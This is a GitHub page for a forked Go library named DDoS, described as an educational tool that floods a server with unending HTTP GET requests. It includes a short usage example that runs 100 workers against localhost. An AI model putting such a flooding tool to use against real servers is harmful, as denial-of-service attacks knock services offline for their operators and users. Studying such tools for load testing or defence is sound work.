Skip to content
/ DDoS Public
forked from Konstantin8105/DDoS

DDoS attack. Creating infinite http GET requests.

License

Notifications You must be signed in to change notification settings

mengyyy/DDoS

 
 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

32 Commits
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

DDoS

Coverage Status Build Status Go Report Card GitHub license GoDoc

DDoS attack. Creating infinite http GET requests. If you need more information, then please see wiki.

Library created just for education task.

Minimal example of using:

func main() {
	workers := 100
	d, err := ddos.New("http://127.0.0.1:80", workers)
	if err != nil {
		panic(err)
	}
	d.Run()
	time.Sleep(time.Second)
	d.Stop()
	fmt.Println("DDoS attack server: http://127.0.0.1:80")
	// Output: DDoS attack server: http://127.0.0.1:80
}

About

DDoS attack. Creating infinite http GET requests.

Resources

License

Stars

Watchers

Forks

Packages

No packages published

Languages

  • Go 100.0%